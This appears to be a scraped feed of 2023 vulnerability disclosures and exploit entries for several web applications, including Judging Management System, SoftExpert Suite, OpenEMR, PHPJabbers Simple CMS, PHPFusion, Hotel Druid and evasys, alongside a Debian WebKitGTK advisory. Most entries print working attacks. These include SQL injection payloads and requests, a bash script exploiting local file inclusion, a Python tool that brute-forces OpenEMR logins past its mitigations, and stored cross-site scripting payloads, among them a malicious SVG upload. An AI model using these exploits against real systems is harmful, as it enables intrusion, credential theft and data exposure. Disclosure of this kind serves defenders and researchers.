Judging Management System v1.0 was discovered to contain a SQL injection vulnerability via the judge_id parameter at /php-jms/edit_judge.php.

Permalink

Cannot retrieve contributors at this time

**Judging Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: whoamikey

vendors: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-jms/edit\_judge.php?sub\_event\_id=&se\_name=&judge\_id=

Vulnerability location: /php-jms/edit\_judge.php?sub\_event\_id=&se\_name=&judge\_id=, judge\_id

dbname =jms\_db

\[+\] Payload: /php-jms/edit\_judge.php?sub\_event\_id=&se\_name=&judge\_id=-1%27%20union%20select%201,2,database(),4,5,6--+ // Leak place ---> judge\_id

GET /php\-jms/edit\_judge.php?sub\_event\_id\=&se\_name\=&judge\_id\=\-1%27%20union%20select%201,2,database(),4,5,6\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=f6bhcgo222sk31fnm99nf9tjt1
Connection: closes

CVE-2023-30204: bug_report/SQLi-3.md at main · debug601/bug_report

A stored cross-site scripting (XSS) vulnerability in DouPHP v1.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the unique_id parameter in /admin/article.php.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2023-30205: DouPHP-xss · Issue #2 · succc3/cve

SoftExpert Suite version 2.1.3 suffers from a local file inclusion vulnerability.

    # Exploit Title: SoftExpert (SE) Suite v2.1.3 - Local File Inclusion# Date: 27-04-2023# Exploit Author: Felipe Alcantara (Filiplain)# Vendor Homepage: https://www.softexpert.com/# Version: 2.0 < 2.1.3# Tested on: Kali Linux# CVE : CVE-2023-30330# SE Suite versions tested: 2.0.15.31, 2.0.15.115# https://github.com/Filiplain/LFI-to-RCE-SE-Suite-2.0# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30330#!/bin/bash# Usage: ./lfi-poc.sh <domain> <username> <password> <File Path> target=$1u=$2p=$3file=$(echo -n "$4"|base64 -w 0)end="\033[0m\e[0m"red="\e[0;31m\033[1m"blue="\e[0;34m\033[1m"echo -e "\n$4 : $file\n"echo -e "${blue}\nGETTING SESSION COOKIE${end}"cookie=$(curl -i -s -k -X $'POST' \    -H "Host: $target" -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 213' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/login?page=home" -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' -H $'Te: trailers' -H $'Connection: close' \    -b $'language=1; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy' \    --data-binary "json=%7B%22AuthenticationParameter%22%3A%7B%22language%22%3A3%2C%22hashGUID%22%3Anull%2C%22domain%22%3A%22%22%2C%22accessType%22%3A%22DESKTOP%22%2C%22login%22%3A%22$u%22%2C%22password%22%3A%22$p%22%7D%7D" \    "https://$target/softexpert/selogin"|grep se-authentication-token |grep "=" |cut -d ';' -f 1|sort -u|cut -d "=" -f 2)echo "cookie: $cookie"function LFI () {curl -s -k -X $'POST' \    -H "Host: $target" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/workspace?page=home" -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-Fetch-Dest: document' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-Site: same-origin' -H 'Te: trailers' -H 'Connection: close' \    -b "se-authentication-token=$cookie; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy" \    --data-binary "action=4&managerName=lol&managerPath=$file&className=ZG9jX2RvY3VtZW50X2FkdmFuY2VkX2dyb3VwX2ZpbHRlcg%3D%3D&instantiate=false&loadJquery=false" \    "https://$target/se/v42300/generic/gn_defaultframe/2.0/defaultframe_filter.php"}echo -e "${blue}\nExploiting LFI:${end}"LFIfunction logout () {curl -i -s -k -X $'POST' \    -H "Host: $target" -H $'Content-Length: 0' -H $'Sec-Ch-Ua: \"Not_A Brand\";v=\"99\", \"Google Chrome\";v=\"109\", \"Chromium\";v=\"109\"' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'X-Requested-With: XMLHttpRequest' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H "Origin: https://$target" -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H "Referer: https://$target/softexpert/workspace?page=home" -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9' -H $'Connection: close' \    -b "se-authentication-token=$cookie; language=1; _ga=GA1.3.1890963078.1675081150; twk_uuid_5db840c5e4c2fa4b6bd8f89a=%7B%22uuid%22%3A%221.bJmDVb5PBlMumGNq2QO9gxk5hjdc6sp2pgENmao2hxHntg00r0qllmuXqCXTWG9uYLT1GkRDFuPY4ir63UIEJEXSS0pIJi8YlIvsB4edfrG1RTcS3CPr58feQBNf1%22%2C%22version%22%3A3%2C%22domain%22%3A%22$target%22%2C%22ts%22%3A1675081174571%7D; mode=deploy" \    "https://$target/softexpert/selogout"}echo -e "${blue}\nLogging out${end}"logout >/dev/nullecho -e "\n\nDone!"

SoftExpert Suite 2.1.3 Local File Inclusion

OpenEMR versions 7.0.1 and below remote authentication bruteforcing tool that bypasses mitigations.

    # Exploit Title: OpenEMR v7.0.1 - Authentication credentials brute force# Date: 2023-04-28# Exploit Author: abhhi (Abhishek Birdawade)# Vendor Homepage: https://www.open-emr.org/# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v7_0_1.tar.gz# Version: 7.0.1# Tested on: Windows'''Example Usage:- python3 exploitBF.py -l "http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default" -u username -p pass.txt '''import requestsimport sysimport argparse, textwrapfrom pwn import *#Expected Argumentsparser = argparse.ArgumentParser(description="OpenEMR <= 7.0.1 Authentication Bruteforce Mitigation Bypass", formatter_class=argparse.RawTextHelpFormatter, epilog=textwrap.dedent(''' Exploit Usage : python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -u username -p pass.txtpython3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul user.txt -p pass.txtpython3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul /Directory/user.txt -p /Directory/pass.txt'''))                     parser.add_argument("-l","--url", help="Path to OpenEMR (Example: http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default)") parser.add_argument("-u","--username", help="Username to Bruteforce for.")parser.add_argument("-ul","--userlist", help="Username Dictionary")  parser.add_argument("-p","--passlist", help="Password Dictionary")    args = parser.parse_args()if len(sys.argv) < 2:    print (f"Exploit Usage: python3 exploitBF.py -h")              sys.exit(1)  # VariableLoginPage = args.urlUsername = args.usernameUsername_list = args.userlistPassword_list = args.passlistlog.info('OpenEMR Authentication Brute Force Mitigation Bypass Script by abhhi \n ')def login(Username,Password):    session = requests.session()              r = session.get(LoginPage) # Progress Check        process = log.progress('Brute Force')#Specifying Headers Value    headerscontent = {    'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',    'Referer' : f"{LoginPage}",    'Origin' : f"{LoginPage}",    }#POST REQ data    postreqcontent = {    'new_login_session_management' : 1,    'languageChoice' : 1,    'authUser' : f"{Username}",    'clearPass' : f"{Password}"    }#Sending POST REQ    r = session.post(LoginPage, data = postreqcontent, headers = headerscontent, allow_redirects= False)#Printing Username:Password                process.status('Testing -> {U}:{P}'.format(U = Username, P = Password))            #Conditional loops        if 'Location' in r.headers:        if "/interface/main/tabs/main.php" in r.headers['Location']:            print()            log.info(f'SUCCESS !!')            log.success(f"Use Credential -> {Username}:{Password}")            sys.exit(0)        #Reading User.txt & Pass.txt filesif Username_list:    userfile = open(Username_list).readlines()    for Username in userfile:        Username = Username.strip() passfile = open(Password_list).readlines()for Password in passfile:    Password = Password.strip()       login(Username,Password)

OpenEMR 7.0.1 Authentication Bruteforce Mitigation Bypass

Debian Linux Security Advisory 5396-1 - Vulnerabilities have been discovered in the WebKitGTK web engine. Luan Herrera discovered that an HTML document may be able to render iframes with sensitive user information. P1umer and Q1IQ discovered that processing maliciously crafted web content may lead to arbitrary code execution. An anonymous researcher discovered that processing maliciously crafted web content may bypass Same Origin Policy. Clement Lecigne and Donncha O Cearbhaill discovered that processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5396-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
May 03, 2023                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2022-0108 CVE-2022-32885 CVE-2023-27932 CVE-2023-27954  
                 CVE-2023-28205

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2022-0108

    Luan Herrera discovered that an HTML document may be able to  
    render iframes with sensitive user information.

CVE-2022-32885

    P1umer and Q1IQ discovered that processing maliciously crafted web  
    content may lead to arbitrary code execution.

CVE-2023-27932

    An anonymous researcher discovered that processing maliciously  
    crafted web content may bypass Same Origin Policy.

CVE-2023-27954

    An anonymous researcher discovered that a website may be able to  
    track sensitive user information.

CVE-2023-28205

    Clement Lecigne and Donncha O Cearbhaill discovered that  
    processing maliciously crafted web content may lead to arbitrary  
    code execution. Apple is aware of a report that this issue may  
    have been actively exploited.

For the stable distribution (bullseye), these problems have been fixed in  
version 2.40.1-1~deb11u1.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmRSI5kACgkQAAyEYu0C  
2AJ8pxAAhwQbCnrdpJ7dl7gU1Yz/nkz1e3Nb9T5u5J32v85uqXj5KPRrtGFTi+uG  
dObt0lPep1Sn07G4wR2WU9SSc8/OPWpEmil0ULHof+YUDA0JVAi0fPT+EL8MFZpa  
H7xKUYYdyVh12wN56yEB7zz698SdrrB32XKfrcQZk5SlbNYaFAGzKhfkhWn/sDmo  
c9XgjH8WULLDpjeU9qRNFmMfw16WWzxuX6JPhyLFxKoT513y1ojEU/zBEqPb/J44  
gD60Kv8qBdgvYzP2VIWm7zX0O3fp5mrkxaBPhpwfaFdG3dBUHm6MzFY/PX5uMXjE  
ZkSUmlTW/pf4pfVkT0w+coDc4kT03QDLIZiY2Z1tn6HHNxNJRcpDq074l+NGIWfb  
SNoJJjbB+t0FAyCvlRuKrd09bsYDexuf/T61dTiWGp5t1AHs3ylBZ7raSCh58iN1  
u0H77NOLXjmNzbNYCCvPHKJukn38GmOTve4ZpFiZqym5X3bZ0/Xv33isnBxqLHoc  
8XJHL57qxIW7ls+yY5rqAUWeRzePZTd1lq3CEWKA/8wUxlEdFKZO2eHtdCykasR3  
8vNyMH77LjGaNdc9pORJv/UVLUcZ8qEeuNKyFYeuhuok6lY5EQBGwAeVVyJNj0Py  
0GufP85ZEdeBL9eKRSBeVJDClm111vJDhtAc57SyTgVSS/5jUoY=  
=xARY  
-----END PGP SIGNATURE-----

Debian Security Advisory 5396-1

PHPJabbers Simple CMS version 5.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: PHPJabbers Simple CMS 5.0 - SQL Injection# Date: 2023-04-29# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://www.phpjabbers.com/faq.php# Software Link: https://www.phpjabbers.com/simple-cms/# Version: 5.0# Tested on: Kali Linux### Request ###GET/simplecms/index.php?action=pjActionGetFile&column=created&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10HTTP/1.1Accept: */*x-requested-with: XMLHttpRequestReferer: https://localhost/simplecms/preview.php?lid=1Cookie: simpleCMS=lhfh97t17ahm8m375r3upfa844;_fbp=fb.1.1682777372679.72057406; pjd=2rnbhrurbqjsuajj7pnffh2292;pjd_simplecms=1; last_position=%2FAccept-Encoding: gzip,deflate,brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Host: localhostConnection: Keep-alive### Parameter & Payloads ###Parameter: column (GET)    Type: boolean-based blind    Title: Boolean-based blind - Parameter replace (original value)    Payload: action=pjActionGetFile&column=(SELECT (CASE WHEN (9869=9869)THEN 2 ELSE (SELECT 2339 UNION SELECT 4063)END))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10    Type: error-based    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (EXTRACTVALUE)    Payload: action=pjActionGetFile&column=2 ANDEXTRACTVALUE(2212,CONCAT(0x5c,0x716b766271,(SELECT(ELT(2212=2212,1))),0x716b707671))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10

PHPJabbers Simple CMS 5.0 SQL Injection

PHPJabbers Simple CMS version 5.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS)# Date: 2023-04-29# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://www.phpjabbers.com/faq.php# Software Link: https://www.phpjabbers.com/simple-cms/# Version: 5.0# Tested on: Kali Linux### Steps to Reproduce ###- Please login from this address:https://localhost/simplecms/index.php?controller=pjAdmin&action=pjActionLogin- Click on the "Add Section" button.- Then enter the payload ("><img src=x onerror=alert("Stored")>) in the"Section" box and save it.- Boom! An alert message saying "Stored" will appear in front of you.### PoC Request ###POST /simplecms/index.php?controller=pjAdminSections&action=pjActionCreateHTTP/1.1Host: localhostCookie: pj_sid=PJ1.0.6199026527.1682777172;pj_so=PJ1.0.6771252593.1682777172; pjd_1682777220_628=1;PHPSESSID=bmannt0kqjm2m0vmb5vj1dbu57; simpleCMS=ejrnh4bmb0ems1j4e4r9fq4eq1;pjd=7l9bb4ubmknrdbns46j7g5cqn7User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101Firefox/102.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 371Origin: https://localhostReferer:https://localhost/simplecms/index.php?controller=pjAdminSections&action=pjActionCreateUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: closesection_create=1&i18n%5B1%5D%5Bsection_name%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%3E&i18n%5B2%5D%5Bsection_name%5D=&i18n%5B3%5D%5Bsection_name%5D=&i18n%5B1%5D%5Bsection_content%5D=%3Cp%3E%22%26gt%3B%26lt%3Bimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%26gt%3B%3C%2Fp%3E&i18n%5B2%5D%5Bsection_content%5D=&i18n%5B3%5D%5Bsection_content%5D=&url=&status=T

PHPJabbers Simple CMS 5.0 Cross Site Scripting

PHPFusion version 9.10.30 suffers from a persistent cross site scripting vulnerability.

Exploit Title: PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS)  
Application: PHPFusion  
Version: 9.10.30  
Bugs:  XSS  
Technology: PHP  
Vendor URL: https://www.php-fusion.co.uk/home.php  
Software Link: https://sourceforge.net/projects/php-fusion/  
Date of found: 28-04-2023  
Author: Mirabbas Ağalarov  
Tested on: Linux 

2. Technical Details & POC  
========================================  
steps: 

1. Go to Fusion file manager (http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553#elf_l1_Lw)  
2. upload malicious svg file

svg file content ===>

<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>  
   <script type="text/javascript">  
      alert(document.location);  
   </script>  
</svg>

poc request:

POST /PHPFusion%209.10.30/files/includes/elFinder/php/connector.php?aid=ecf01599cf9cd553 HTTP/1.1  
Host: localhost  
Content-Length: 1198  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
sec-ch-ua-platform: "Linux"  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxF2jB690PpLWInAA  
Accept: */*  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: fusion2847q_lastvisit=1682673668; fusion2847q_user=1.1682850094.7126692a74723afe3bc7e3fb130a60838c1aa1bcae83f7497402ce9f009f96ff; fusion2847q_admin=1.1682850118.14c483fed28d5a89734c158bbb9aa88eab03a5c4a97316c372dd3b2591d6982a; fusion2847q_session=q0ifs4lhqt9fm6h3jclbea79vf; fusion2847q_visited=yes; usertbl_results=user_joined%2Cuser_lastvisit%2Cuser_groups; usertbl_status=0  
Connection: close

------WebKitFormBoundaryxF2jB690PpLWInAA  
Content-Disposition: form-data; name="reqid"

187c77be8e52cf  
------WebKitFormBoundaryxF2jB690PpLWInAA  
Content-Disposition: form-data; name="cmd"

upload  
------WebKitFormBoundaryxF2jB690PpLWInAA  
Content-Disposition: form-data; name="target"

l1_Lw  
------WebKitFormBoundaryxF2jB690PpLWInAA  
Content-Disposition: form-data; name="hashes[l1_U1ZHX1hTUy5zdmc]"

SVG_XSS.svg  
------WebKitFormBoundaryxF2jB690PpLWInAA  
Content-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg"  
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>  
   <script type="text/javascript">  
      alert(document.location);  
   </script>  
</svg>  
------WebKitFormBoundaryxF2jB690PpLWInAA  
Content-Disposition: form-data; name="mtime[]"

1681116842  
------WebKitFormBoundaryxF2jB690PpLWInAA  
Content-Disposition: form-data; name="overwrite"

0  
------WebKitFormBoundaryxF2jB690PpLWInAA--

3. Then go to images (http://localhost/PHPFusion%209.10.30/files/administration/images.php?aid=ecf01599cf9cd553) or directly go to svg file(  
http://localhost/PHPFusion%209.10.30/files/images/SVG_XSS.svg)

poc video : https://youtu.be/6yBLnRH8pOY

PHPFusion 9.10.30 Cross Site Scripting

A Stored Cross Site Scripting (XSS) vulnerability exists in multiple pages of Hotel Druid version 3.0.4, which allows arbitrary execution of commands. The vulnerable fields are Surname, Name, and Nickname in the Document function.

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**1** branch **0** tags

Code

*   Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

**CVE-2023-29839 Hotel Druid 3.0.4 Stored Cross Site Scripting Vulnerability**

CMS Link: https://www.hoteldruid.com/

Version Affected: 3.0.4

Severity & CVSS: TODO: Update when MITRE publishes CVE

A Stored Cross Site Scripting (XSS) vulnerability exists in multiple pages in Version 3.0.4 of the Hotel Druid application that allows for arbitrary execution of commands.

Vulnerable Fields: Surname, Name, Nickname in the "Document" function

Affected Links: /visualizza_contratto.php

Triggering the payload: Visit the **Example** document preview function

Remediation: Update to HotelDruid version 3.0.5

Steps to Reproduce:

1.  Enter a XSS payload into a client's name. This can be done during room reservation or a brand new registration of a client. The payload used is <script>alert(document.domain)</script>

2.  Navigate to "Clients" tab and select the client with the XSS payload by clicking on the "N" column
3.  In this page, there are 2 ways to trigger the stored XSS payload. The first is by viewing the **Example** document in the top right hand corner of the page

4.  The second way to trigger the XSS payload is to navigate to the bottom of the page where you can modify the client's data
5.  Once again, select the **Example** document and click on "View"

6.  There are also other methods to trigger the XSS payload. By navigating to "Reservations" and modifying the client's reservation

7.  Scroll to the bottom of the page and once again select the **Example** document and click on "View"

CVE-2023-29839: GitHub - jichngan/CVE-2023-29839: Hotel Druid 3.0.4 Stored Cross Site Scripting Vulnerability

Multiple components (such as Onlinetemplate-Verwaltung, Liste aller Teilbereiche, Umfragen anzeigen, and questionnaire previews) in evasys before 8.2 Build 2286 and 9.x before 9.0 Build 2401 allow authenticated attackers to read and write to unauthorized data by accessing functions directly.

3 minutes

**Affected Product:** Evasys

**Affected Versions:** evasys v8.2 Build 2275 - 2285 and evasys v9.0 Build 2400 (both according to vendor)

**Fixed Version:** v8.2 Build 2286 and v9.0 Build 2401

**CVE-Number:** CVE-2023-31435

**Severity:** 8,1 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)

_Discovered by Dipl-Ing. Mario Rubak, BSc MSc and Regina Kohl, BSc_

Several instances were discovered where the implemented authorization scheme can be circumvented.

**Proof of Concept**

**Read access (with valid token):** Users with the role of ‘Teilbereichsadmin’ can access the following URLs through their dashboard. If these URLs are entered with the trainer’s currently valid token in the browser, the trainer can call functions that are not available in the GUI

    Liste aller Teilbereiche
    https://example.com/evasys/public/default/subunit/index?sNewMenuitemID=Headmenu_Subunits&TOKEN=<valid-trainer-token>
    
    Umfragen anzeigen (including display of users)
    https://example.com/evasys/public/default/surveylist/index?mode=show_zentview&subunits=1&refresh_session=1&instructors=35&periods=-1&TOKEN=<valid-trainer-token>
    
    Performanzübersicht (including display of current user)
    https://example.com/evasys/public/default/performance/index?sNewMenuitemID=Systemperformance&TOKEN=<valid-trainer-token>
    
    Dokumente und Vorlagen (including download of documents)
    https://example.com/evasys/public/legacy/document.php?documentid=5&TOKEN=<valid-trainer-token> 
    
    Export von anderen Fragebögen (.vfd files)
    https://example.com/evasys/public/legacy/form_script.php?build=/&export=/&frmid=2139&TOKEN=<valid-trainer-token>
    
    Umfragen anzeigen (including display of multiple data such as users, ...)
    https://example.com/evasys/public/default/surveylist/index?TOKEN=<valid-trainer-token>
    

It is noticeable that the “trainer” role sometimes sees more data than the “Teilbereichsadmin” role, as can be seen in the following figure. 

**Read access (without token):** Furthermore, a trainer can view other questionnaires by enumerating the frmid: https://example.com/evasys/public/online/index/preview?frmid=2139&nOnlineTemplateId=0 **Write access:** As previously explained, users can gain partial access to URLs that are not accessible through the GUI if they use their valid token in the TOKEN parameter. The following example demonstrates a scenario where users are not only granted read access but also write access. Specifically, it shows how the template name of an online template of another user can be modified.

The following URL cannot be accessed via the sub-admin dashboard. However, if the sub-admin enters the following URL with their current token in the browser, they can access the online template management.

    https://example.com/evasys/public/default/onlinetemplatelist/index?sNewMenuitemID=OnlineTemplates&TOKEN=<valid-"Teilbereichsadmin"-Token>
    

As shown in the figure below, the application only displays the user’s own online templates and those of the SYSTEM. However, a user with the “Teilbereichsadmin” role can create new online templates (in this case, Online Template ID 7 was created by the researchers) or modify existing online templates belonging to other users.

If the user attempts to edit their own template (using the pencil icon) and includes the ID of another user’s online template in the corresponding request, they can change the name of that user’s online template, even if it is not displayed in the application interface.

 

Another method for unauthorized changes involves editing other users. To do this, a valid request that permits editing a user must be intercepted using an HTTP proxy and the parameter ‘userid’ must be modified to a valid value. By doing so, the auditors were able to access the ‘Edit user attributes’ interface of a user who could not be directly edited through the GUI. It is worth noting that the auditors did not attempt to make or save any changes.  

Date

Action

2022/07/26

Discovery of the vulnerability

2023/08/05

Bulk disclosure of multiple vulnerabilities using the vendors support mail

2023/08/08

Vendors respond that they acknowledge the findings and start to work on a fix

2023/08/10

Evasys shares detailed plan for the fix with the researchers and asks for a few months of time before disclosing the vulnerability

2023/08/23

Vendor responds that the vulnerabilities will be fixed in version 8.2 and 9.0 in 2023/09/06

2023/01/02

First attempt to request CVEs at MITRE

2023/03/23

Request was closed by MITRE without stating a reason

2023/04/24

Second attempt to request CVEs at MITRE

2023/04/28

MITRE assigns CVE-2023-31435

2023/05/02

The Venord affirms that publication of the vulnerability is permissible

2023/05/02

CVE-2023-31435 has been published

autorisation bypass evasys

586 Words

2023-05-02 09:35

Tag

#php